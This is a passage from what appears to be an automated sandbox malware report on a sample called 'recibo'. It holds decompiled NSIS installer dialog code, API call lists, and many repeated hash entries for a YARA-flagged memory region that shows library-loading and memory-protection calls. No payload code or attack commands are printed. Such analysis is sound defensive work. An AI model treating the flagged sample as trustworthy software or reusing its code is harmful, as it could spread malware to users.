                                                                                  								_v8 = 1;
                                                                                  							}
                                                                                  							E0040653D(0x42b238, _t146);
                                                                                  							_t87 = E0040690A(1);
                                                                                  							_v16 = _t87;
                                                                                  							if(_t87 == 0) {
                                                                                  								L30:
                                                                                  								E0040653D(0x42b238, _t146);
                                                                                  								_t89 = E00405EB7(0x42b238);
                                                                                  								_t158 = 0;
                                                                                  								if(_t89 != 0) {
                                                                                  									 *_t89 = 0;
                                                                                  								}
                                                                                  								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                  									goto L35;
                                                                                  								} else {
                                                                                  									_t169 = 0x400;
                                                                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                  									asm("cdq");
                                                                                  									_v48 = _t109;
                                                                                  									_v44 = _t156;
                                                                                  									_v12 = 1;
                                                                                  									goto L36;
                                                                                  								}
                                                                                  							} else {
                                                                                  								_t159 = 0;
                                                                                  								if(0 == 0x42b238) {
                                                                                  									goto L30;
                                                                                  								} else {
                                                                                  									goto L26;
                                                                                  								}
                                                                                  								while(1) {
                                                                                  									L26:
                                                                                  									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                                                  									if(_t114 != 0) {
                                                                                  										break;
                                                                                  									}
                                                                                  									if(_t159 != 0) {
                                                                                  										 *_t159 =  *_t159 & _t114;
                                                                                  									}
                                                                                  									_t160 = E00405E58(0x42b238);
                                                                                  									 *_t160 =  *_t160 & 0x00000000;
                                                                                  									_t159 = _t160;
                                                                                  									 *_t159 = 0x5c;
                                                                                  									if(_t159 != 0x42b238) {
                                                                                  										continue;
                                                                                  									} else {
                                                                                  										goto L30;
                                                                                  									}
                                                                                  								}
                                                                                  								_t150 = _v44;
                                                                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                  								_v44 = _t150 >> 0xa;
                                                                                  								_v12 = 1;
                                                                                  								_t158 = 0;
                                                                                  								__eflags = 0;
                                                                                  								L35:
                                                                                  								_t169 = 0x400;
                                                                                  								L36:
                                                                                  								_t95 = E00404E27(5);
                                                                                  								if(_v12 != _t158) {
                                                                                  									_t197 = _v44;
                                                                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                  										_v8 = 2;
                                                                                  									}
                                                                                  								}
                                                                                  								_t147 =  *0x433edc; // 0x5c09b6
                                                                                  								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                  									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                                                  									if(_v12 == _t158) {
                                                                                  										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                                                  									} else {
                                                                                  										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                                                  									}
                                                                                  								}
                                                                                  								_t96 = _v8;
                                                                                  								 *0x434fa4 = _t96;
                                                                                  								if(_t96 == _t158) {
                                                                                  									_v8 = E0040140B(7);
                                                                                  								}
                                                                                  								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                  									_v8 = _t158;
                                                                                  								}
                                                                                  								E004044BB(0 | _v8 == _t158);
                                                                                  								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                                                  									E004048E3();
                                                                                  								}
                                                                                  								 *0x42d258 = _t158;
                                                                                  								goto L53;
                                                                                  							}
                                                                                  						}
                                                                                  						_t186 = _a8 - 0x405;
                                                                                  						if(_a8 != 0x405) {
                                                                                  							goto L53;
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  					_t118 = _a12 & 0x0000ffff;
                                                                                  					if(_t118 != 0x3fb) {
                                                                                  						L12:
                                                                                  						if(_t118 == 0x3e9) {
                                                                                  							_t152 = 7;
                                                                                  							memset( &_v76, 0, _t152 << 2);
                                                                                  							_v80 = _t167;
                                                                                  							_v72 = 0x42d268;
                                                                                  							_v60 = E00404CE0;
                                                                                  							_v56 = _t146;
                                                                                  							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                                                  							_t122 =  &_v80;
                                                                                  							_v64 = 0x41;
                                                                                  							__imp__SHBrowseForFolderW(_t122);
                                                                                  							if(_t122 == 0) {
                                                                                  								_a8 = 0x40f;
                                                                                  							} else {
                                                                                  								__imp__CoTaskMemFree(_t122);
                                                                                  								E00405E0C(_t146);
                                                                                  								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                                                  								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
                                                                                  									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                                                  									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                                                  										lstrcatW(_t146, 0x432ea0);
                                                                                  									}
                                                                                  								}
                                                                                  								 *0x42d258 =  *0x42d258 + 1;
                                                                                  								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                  							}
                                                                                  						}
                                                                                  						goto L20;
                                                                                  					}
                                                                                  					if(_a12 >> 0x10 != 0x300) {
                                                                                  						goto L53;
                                                                                  					}
                                                                                  					_a8 = 0x40f;
                                                                                  					goto L12;
                                                                                  				} else {
                                                                                  					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                  					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                                                  						E00405E0C(_t146);
                                                                                  					}
                                                                                  					 *0x433ed8 = _t167;
                                                                                  					SetWindowTextW(_t166, _t146);
                                                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                  					_push(1);
                                                                                  					E00404499(_t167);
                                                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                  					_push(0x14);
                                                                                  					E00404499(_t167);
                                                                                  					E004044CE(_t166);
                                                                                  					_t138 = E0040690A(8);
                                                                                  					if(_t138 == 0) {
                                                                                  						L53:
                                                                                  						return E00404500(_a8, _a12, _a16);
                                                                                  					} else {
                                                                                  						 *_t138(_t166, 1);
                                                                                  						goto L8;
                                                                                  					}
                                                                                  				}
                                                                                  			}


                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                  • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                    • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                    • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                    • Part of subcall function 004067C4: CharPrevW.USER32(?,?,77343420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                  • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                    • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                    • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                    • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: A$Call
                                                                                  • API String ID: 2624150263-209694386
                                                                                  • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                  • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                                  • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                                  • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadMemoryProtectVirtual
                                                                                  • String ID: t|>$vq$QS*
                                                                                  • API String ID: 3389902171-2975856299
                                                                                  • Opcode ID: 896a8931252b7b0cefaa511ff951cc9e9fcf6507a12be52f17c7ef262237a389
                                                                                  • Instruction ID: 9a2f0b501246d2ef7b5609a883fdbb4a56d290e07d81b721caa60c56b3a2e905
                                                                                  • Opcode Fuzzy Hash: 896a8931252b7b0cefaa511ff951cc9e9fcf6507a12be52f17c7ef262237a389
                                                                                  • Instruction Fuzzy Hash: F1423A706083868EDF35DF3888A87DA7BD29F522A0F99C25ECCD59F196D3358582C712
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo${Z&n
                                                                                  • API String ID: 0-3281381622
                                                                                  • Opcode ID: e725ec3d72d5032783e48207673a2fa575478d920e16d966d527816876fe9227
                                                                                  • Instruction ID: f497886e38a8ae99f4e3cb05ad683b0e16ca44954a923f999826232742c16944
                                                                                  • Opcode Fuzzy Hash: e725ec3d72d5032783e48207673a2fa575478d920e16d966d527816876fe9227
                                                                                  • Instruction Fuzzy Hash: 7402AD42E3E70599EB833033C1617E76785CF271C6E218B5ADC2AB2961771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo${Z&n
                                                                                  • API String ID: 0-3281381622
                                                                                  • Opcode ID: 16ef3232dc12bbd8aa01337f147de15d755976073a4a8d604c7c16a0314f85cc
                                                                                  • Instruction ID: f38c683280b070639605d44c9a30e6c9bb7c9e2bed8f68f153ff6320534561ac
                                                                                  • Opcode Fuzzy Hash: 16ef3232dc12bbd8aa01337f147de15d755976073a4a8d604c7c16a0314f85cc
                                                                                  • Instruction Fuzzy Hash: 4502BD42E3E70599EB833033C5617E76745CF271C6E228B5ACC2A729A1771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo${Z&n
                                                                                  • API String ID: 0-3281381622
                                                                                  • Opcode ID: 59f3652e208188ba523701e8a26fc43b1e30e816cfb7945a0874ea6689d6ba41
                                                                                  • Instruction ID: 906cee4296cbe430caa5955602397a59818644d36b20ef244e97777acfd8cbb6
                                                                                  • Opcode Fuzzy Hash: 59f3652e208188ba523701e8a26fc43b1e30e816cfb7945a0874ea6689d6ba41
                                                                                  • Instruction Fuzzy Hash: 7A02AC42E3E70599EB833033C5617E76785CF271C6E228B5ADC2A71961771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 655873dc0def2949bcf395504207e64fbcfc172138fc542114df641a750a8902
                                                                                  • Instruction ID: d6e457819a96f7ae8e502510443dbc27609d73d57271198f81d5b747edc36cf9
                                                                                  • Opcode Fuzzy Hash: 655873dc0def2949bcf395504207e64fbcfc172138fc542114df641a750a8902
                                                                                  • Instruction Fuzzy Hash: 8AF1BD42E2E30599EB933033C1667E76785CF271C6E218B5ACC2AB1965771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: c31be793a70704f0c5e116a32ece193d1cd80ce6d6fe589d3d76b1db7d07274d
                                                                                  • Instruction ID: 6e04fc907444b470287a7eea8c1f3911dfbea60a795645f143e3d2de9abc27af
                                                                                  • Opcode Fuzzy Hash: c31be793a70704f0c5e116a32ece193d1cd80ce6d6fe589d3d76b1db7d07274d
                                                                                  • Instruction Fuzzy Hash: FDF1CD42E3E30599EB933033C5663E75785CF271C6E218B5ACC2AB1966771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 144f188836c6864deab39f83a227fd9d6adecaa246c49b9d5a1cc3b778eb263f
                                                                                  • Instruction ID: 97fb72196a252082230b22d76ede9afb871b162a85d844494134d97511226aa7
                                                                                  • Opcode Fuzzy Hash: 144f188836c6864deab39f83a227fd9d6adecaa246c49b9d5a1cc3b778eb263f
                                                                                  • Instruction Fuzzy Hash: B8E1BD42E3E30599EB933033C1663E75785CF271C6E218B5ACC2AB1966771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: cb0be19b33c7ae452eae970f20a27f2a809fc4b74b7dc232f85be5d80dd73254
                                                                                  • Instruction ID: ce6d6da227587d9c5ba0b4240ddf71d0b859b2de053f36587ab7bf02560211d6
                                                                                  • Opcode Fuzzy Hash: cb0be19b33c7ae452eae970f20a27f2a809fc4b74b7dc232f85be5d80dd73254
                                                                                  • Instruction Fuzzy Hash: 1EF1BE42E2E30599EB933033C1663E75785CF271C6E218B5ACC2AB1965771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: d527125ec972667da79c48d9b830fd25a7aefaf8e5a51d92cd1d9853bae8fb7c
                                                                                  • Instruction ID: aa94f646bdf7b33491d39c371196b709ed60df365d97cec618ed6ca1c76a27fe
                                                                                  • Opcode Fuzzy Hash: d527125ec972667da79c48d9b830fd25a7aefaf8e5a51d92cd1d9853bae8fb7c
                                                                                  • Instruction Fuzzy Hash: B8E1CE42E3E30599EB933032C1667E75745CF271C6E218B5ACC2A72866771F0E8EC9C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 876cad247d70f519c2f17d4dcec1ee450bc68741b64ca708e5657c3ae3d71057
                                                                                  • Instruction ID: 14bcab254972ef8a3cf01e9a5832ae87fa4511d3a203c3a349be9e68c1fe5756
                                                                                  • Opcode Fuzzy Hash: 876cad247d70f519c2f17d4dcec1ee450bc68741b64ca708e5657c3ae3d71057
                                                                                  • Instruction Fuzzy Hash: B5D1C042E3E30699EB933073C1657E75745CF271C6E218B5ACC2AB2866771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: f5e0701cae92fb331631c5a3c829338a77dc1cb3f776ca22fe63ce350d175308
                                                                                  • Instruction ID: 530a29342437323228ff30f369334f6e1f2667b5870622c3d90dddbeec95afbf
                                                                                  • Opcode Fuzzy Hash: f5e0701cae92fb331631c5a3c829338a77dc1cb3f776ca22fe63ce350d175308
                                                                                  • Instruction Fuzzy Hash: 07E1AD42E3E30699EB933032C1667E75745CF271C6E218B5ACC2A72866771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 6958ffa3f691775d4b0581c6a67795ffb0075cb28ea513f6699ef4e82c016f06
                                                                                  • Instruction ID: 5e35d633750dd789e7126f9661e75f19c157d23c592594c33c37a74e67eaeeca
                                                                                  • Opcode Fuzzy Hash: 6958ffa3f691775d4b0581c6a67795ffb0075cb28ea513f6699ef4e82c016f06
                                                                                  • Instruction Fuzzy Hash: 7BE1BD42E3E30599EB933032C1653E75785DF271C6E218B5ACC2AB1966771F0E8EC9C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 685d25d49b7775c36d338f7e14e4763d44e62cb7a3cecac7a6d322f6e360c960
                                                                                  • Instruction ID: 38aed3dc5af557f42d15415744fd4b30040c37c7b00c1b7b6668f142d008a478
                                                                                  • Opcode Fuzzy Hash: 685d25d49b7775c36d338f7e14e4763d44e62cb7a3cecac7a6d322f6e360c960
                                                                                  • Instruction Fuzzy Hash: E2E1AD42E3E30699EB933032C1667E75745CF271C6E218B5ACC2AB1966771F0E8EC9C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: a419351939acf18299c8bfe398fe47c0574d3f3b1b810b97cd9edd10db039f40
                                                                                  • Instruction ID: c119451ac745014f103b912482cbe7bd3fc1803927ddd17816c76aa5b8048cd2
                                                                                  • Opcode Fuzzy Hash: a419351939acf18299c8bfe398fe47c0574d3f3b1b810b97cd9edd10db039f40
                                                                                  • Instruction Fuzzy Hash: 7CE1BE42E3E30599EB933032C1657E75745CF271C6E218B5ACC2AB1966771F0E8EC9C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: fbe9177192f642a4b7df91a4198dd96f77bb736e698528f12b4ac076b4118e39
                                                                                  • Instruction ID: a89e8f3e45e90c20524944a909ced53fa42d34b083336c5b263bc0ee8cf594ba
                                                                                  • Opcode Fuzzy Hash: fbe9177192f642a4b7df91a4198dd96f77bb736e698528f12b4ac076b4118e39
                                                                                  • Instruction Fuzzy Hash: 55D1C142E3E30699EB933073C1653E75745CF271C6D218B5ACC2AB2866771F0E8E89C5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: e06878da6993f2fe6d02dc18aef04d2bf5e2f3d487856fa773bb92425814068a
                                                                                  • Instruction ID: af4664a2f5374e85b0a5c3817646b947d471405d5365deb7ae908ff254fb7b18
                                                                                  • Opcode Fuzzy Hash: e06878da6993f2fe6d02dc18aef04d2bf5e2f3d487856fa773bb92425814068a
                                                                                  • Instruction Fuzzy Hash: 03C1E146E3E30699EB93303381663E75745CF272C6E618B5BCC2A72866771B0E4EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 0b95d783450a1f3310b0c82aaa5d628943c31f39644cb50abf9db9f304ecc157
                                                                                  • Instruction ID: 791b4391c7ece2a6b449922346187317c08bed8b20717281a31729c4e38657a5
                                                                                  • Opcode Fuzzy Hash: 0b95d783450a1f3310b0c82aaa5d628943c31f39644cb50abf9db9f304ecc157
                                                                                  • Instruction Fuzzy Hash: D0C1CF46E3E30699EB93303281663E75745CF271C6E618B5ACC2A72866771F0E8EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: e94cf14f889529d4668e828ec4774c098f13d3f4e97c1cd58ebdb5020b19af72
                                                                                  • Instruction ID: 196071782e1cfe75ff5f1063cf9a45a2f981c0934cf733ec97d1b956c47beef2
                                                                                  • Opcode Fuzzy Hash: e94cf14f889529d4668e828ec4774c098f13d3f4e97c1cd58ebdb5020b19af72
                                                                                  • Instruction Fuzzy Hash: E0D1D142E3E30699EB93303381657E75745CF271C5E618B5ACC2A72865771F0E8EC9C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: d55a59d29f1903248987c2f1b4baa72f32c2d31eecaa00dc1b8ba924c7ab2c84
                                                                                  • Instruction ID: 606016da300f63207396cd41a8bc36e326805b611f5ac61b44ae540fb256b920
                                                                                  • Opcode Fuzzy Hash: d55a59d29f1903248987c2f1b4baa72f32c2d31eecaa00dc1b8ba924c7ab2c84
                                                                                  • Instruction Fuzzy Hash: B2C1D146E3E30699EB93303281663E75745CF271C6D618B5ACC2A72865771F0E8EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false

                                                                                  C-Code - Quality: 67%
                                                                                  			E004021AA(void* __eflags) {
                                                                                  				signed int _t52;
                                                                                  				void* _t56;
                                                                                  				intOrPtr* _t60;
